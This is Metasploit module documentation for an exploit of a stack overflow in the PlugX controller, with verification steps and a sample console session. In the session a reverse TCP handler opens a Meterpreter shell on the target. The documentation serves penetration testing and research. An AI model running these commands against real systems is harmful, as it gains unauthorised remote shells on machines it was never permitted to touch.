ContextQMD
Back to Metasploit Framework

Plugx

documentation/modules/exploit/windows/misc/plugx.md

6.4.1311.4 KB
Original Source

Vulnerable Application

This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message. This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained.

A vulnerable version of the software is available here: PlugX type 1

Verification Steps

  1. Run the application
  2. Start msfconsole
  3. Do: use exploit/windows/misc/plugx
  4. Do: set rhost [ip]
  5. Do: set target [target]
  6. Do: exploit
  7. Click OK for the "PeDecodePacket" pop-up on the target
  8. Get a shell

Scenarios

Windows XP SP3 with PlugX type 1

msf > use exploit/windows/misc/plugx 
msf exploit(plugx) > set rhost 1.2.3.4
rhost => 1.2.3.4
msf exploit(plugx) > set target 1
target => 1
msf exploit(plugx) > set verbose true
verbose => true
msf exploit(plugx) > exploit

[*] Started reverse TCP handler on 1.2.3.99:4444 
[*] 1.2.3.4:13579 - Trying target PlugX Type I...
[*] 1.2.3.4:13579 - waiting for response
[*] Sending stage (956991 bytes) to 1.2.3.4
[*] Meterpreter session 1 opened (1.2.3.99:4444 -> 1.2.3.4:1975) at 2017-09-04 19:53:07 -0400
[*] 1.2.3.4:13579 - Server closed connection

meterpreter > getuid
Server username: WINXP\user